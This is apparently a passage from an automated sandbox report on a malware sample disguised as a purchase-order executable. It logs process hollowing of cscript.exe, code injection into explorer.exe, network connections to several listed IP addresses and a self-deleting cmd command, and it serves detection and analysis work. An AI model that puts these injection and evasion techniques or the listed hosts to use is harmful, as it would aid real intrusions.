          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C6870 mov eax, dword ptr fs:[00000030h]2_2_017C6870
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C6870 mov eax, dword ptr fs:[00000030h]2_2_017C6870
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01760854 mov eax, dword ptr fs:[00000030h]2_2_01760854
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734859 mov eax, dword ptr fs:[00000030h]2_2_01734859
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01734859 mov eax, dword ptr fs:[00000030h]2_2_01734859
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01742840 mov ecx, dword ptr fs:[00000030h]2_2_01742840
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01752835 mov eax, dword ptr fs:[00000030h]2_2_01752835
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01752835 mov eax, dword ptr fs:[00000030h]2_2_01752835
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01752835 mov eax, dword ptr fs:[00000030h]2_2_01752835
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01752835 mov ecx, dword ptr fs:[00000030h]2_2_01752835
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01752835 mov eax, dword ptr fs:[00000030h]2_2_01752835
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01752835 mov eax, dword ptr fs:[00000030h]2_2_01752835
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_018008C0 mov eax, dword ptr fs:[00000030h]2_2_018008C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176A830 mov eax, dword ptr fs:[00000030h]2_2_0176A830
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D483A mov eax, dword ptr fs:[00000030h]2_2_017D483A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D483A mov eax, dword ptr fs:[00000030h]2_2_017D483A
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BC810 mov eax, dword ptr fs:[00000030h]2_2_017BC810
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C8F9 mov eax, dword ptr fs:[00000030h]2_2_0176C8F9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176C8F9 mov eax, dword ptr fs:[00000030h]2_2_0176C8F9
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FA8E4 mov eax, dword ptr fs:[00000030h]2_2_017FA8E4
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175E8C0 mov eax, dword ptr fs:[00000030h]2_2_0175E8C0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BC89D mov eax, dword ptr fs:[00000030h]2_2_017BC89D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730887 mov eax, dword ptr fs:[00000030h]2_2_01730887
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0172CB7E mov eax, dword ptr fs:[00000030h]2_2_0172CB7E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01728B50 mov eax, dword ptr fs:[00000030h]2_2_01728B50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DEB50 mov eax, dword ptr fs:[00000030h]2_2_017DEB50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E4B4B mov eax, dword ptr fs:[00000030h]2_2_017E4B4B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E4B4B mov eax, dword ptr fs:[00000030h]2_2_017E4B4B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C6B40 mov eax, dword ptr fs:[00000030h]2_2_017C6B40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017C6B40 mov eax, dword ptr fs:[00000030h]2_2_017C6B40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017FAB40 mov eax, dword ptr fs:[00000030h]2_2_017FAB40
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017D8B42 mov eax, dword ptr fs:[00000030h]2_2_017D8B42
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175EB20 mov eax, dword ptr fs:[00000030h]2_2_0175EB20
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175EB20 mov eax, dword ptr fs:[00000030h]2_2_0175EB20
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F8B28 mov eax, dword ptr fs:[00000030h]2_2_017F8B28
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017F8B28 mov eax, dword ptr fs:[00000030h]2_2_017F8B28
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017AEB1D mov eax, dword ptr fs:[00000030h]2_2_017AEB1D
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804B00 mov eax, dword ptr fs:[00000030h]2_2_01804B00
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738BF0 mov eax, dword ptr fs:[00000030h]2_2_01738BF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738BF0 mov eax, dword ptr fs:[00000030h]2_2_01738BF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738BF0 mov eax, dword ptr fs:[00000030h]2_2_01738BF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175EBFC mov eax, dword ptr fs:[00000030h]2_2_0175EBFC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BCBF0 mov eax, dword ptr fs:[00000030h]2_2_017BCBF0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DEBD0 mov eax, dword ptr fs:[00000030h]2_2_017DEBD0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01750BCB mov eax, dword ptr fs:[00000030h]2_2_01750BCB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01750BCB mov eax, dword ptr fs:[00000030h]2_2_01750BCB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01750BCB mov eax, dword ptr fs:[00000030h]2_2_01750BCB
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730BCD mov eax, dword ptr fs:[00000030h]2_2_01730BCD
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730BCD mov eax, dword ptr fs:[00000030h]2_2_01730BCD
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730BCD mov eax, dword ptr fs:[00000030h]2_2_01730BCD
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740BBE mov eax, dword ptr fs:[00000030h]2_2_01740BBE
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740BBE mov eax, dword ptr fs:[00000030h]2_2_01740BBE
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E4BB0 mov eax, dword ptr fs:[00000030h]2_2_017E4BB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017E4BB0 mov eax, dword ptr fs:[00000030h]2_2_017E4BB0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01802B57 mov eax, dword ptr fs:[00000030h]2_2_01802B57
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01802B57 mov eax, dword ptr fs:[00000030h]2_2_01802B57
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01802B57 mov eax, dword ptr fs:[00000030h]2_2_01802B57
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01802B57 mov eax, dword ptr fs:[00000030h]2_2_01802B57
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01804A80 mov eax, dword ptr fs:[00000030h]2_2_01804A80
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017ACA72 mov eax, dword ptr fs:[00000030h]2_2_017ACA72
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017ACA72 mov eax, dword ptr fs:[00000030h]2_2_017ACA72
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176CA6F mov eax, dword ptr fs:[00000030h]2_2_0176CA6F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176CA6F mov eax, dword ptr fs:[00000030h]2_2_0176CA6F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176CA6F mov eax, dword ptr fs:[00000030h]2_2_0176CA6F
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017DEA60 mov eax, dword ptr fs:[00000030h]2_2_017DEA60
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736A50 mov eax, dword ptr fs:[00000030h]2_2_01736A50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736A50 mov eax, dword ptr fs:[00000030h]2_2_01736A50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736A50 mov eax, dword ptr fs:[00000030h]2_2_01736A50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736A50 mov eax, dword ptr fs:[00000030h]2_2_01736A50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736A50 mov eax, dword ptr fs:[00000030h]2_2_01736A50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736A50 mov eax, dword ptr fs:[00000030h]2_2_01736A50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01736A50 mov eax, dword ptr fs:[00000030h]2_2_01736A50
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740A5B mov eax, dword ptr fs:[00000030h]2_2_01740A5B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01740A5B mov eax, dword ptr fs:[00000030h]2_2_01740A5B
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01754A35 mov eax, dword ptr fs:[00000030h]2_2_01754A35
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01754A35 mov eax, dword ptr fs:[00000030h]2_2_01754A35
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176CA24 mov eax, dword ptr fs:[00000030h]2_2_0176CA24
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0175EA2E mov eax, dword ptr fs:[00000030h]2_2_0175EA2E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_017BCA11 mov eax, dword ptr fs:[00000030h]2_2_017BCA11
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176AAEE mov eax, dword ptr fs:[00000030h]2_2_0176AAEE
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_0176AAEE mov eax, dword ptr fs:[00000030h]2_2_0176AAEE
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01730AD0 mov eax, dword ptr fs:[00000030h]2_2_01730AD0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01764AD0 mov eax, dword ptr fs:[00000030h]2_2_01764AD0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01764AD0 mov eax, dword ptr fs:[00000030h]2_2_01764AD0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01786ACC mov eax, dword ptr fs:[00000030h]2_2_01786ACC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01786ACC mov eax, dword ptr fs:[00000030h]2_2_01786ACC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01786ACC mov eax, dword ptr fs:[00000030h]2_2_01786ACC
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738AA0 mov eax, dword ptr fs:[00000030h]2_2_01738AA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01738AA0 mov eax, dword ptr fs:[00000030h]2_2_01738AA0
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01786AA4 mov eax, dword ptr fs:[00000030h]2_2_01786AA4
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeCode function: 2_2_01768A90 mov edx, dword ptr fs:[00000030h]2_2_01768A90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070647E GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,4_2_0070647E
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4_2_0070DCAA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0070DCAA
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 13.248.169.48 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 102.134.40.151 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.76.63.192 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.165.166 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.147.240.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeMemory written: C:\Users\user\Desktop\Purchase Order#23113.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 700000Jump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeProcess created: C:\Users\user\Desktop\Purchase Order#23113.exe "C:\Users\user\Desktop\Purchase Order#23113.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Purchase Order#23113.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000002.4205364181.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4200505291.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4200505291.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1773323446.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.4199885899.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000003.00000002.4200505291.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1773323446.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.4200505291.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1773323446.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Windows\SysWOW64\cscript.exeCode function: GetUserDefaultLCID,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,4_2_0070AADC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: GetLocaleInfoW,wcsncmp,4_2_00717E85
          Source: C:\Windows\SysWOW64\cscript.exeCode function: GetLocaleInfoW,4_2_0070AB35
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Users\user\Desktop\Purchase Order#23113.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order#23113.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
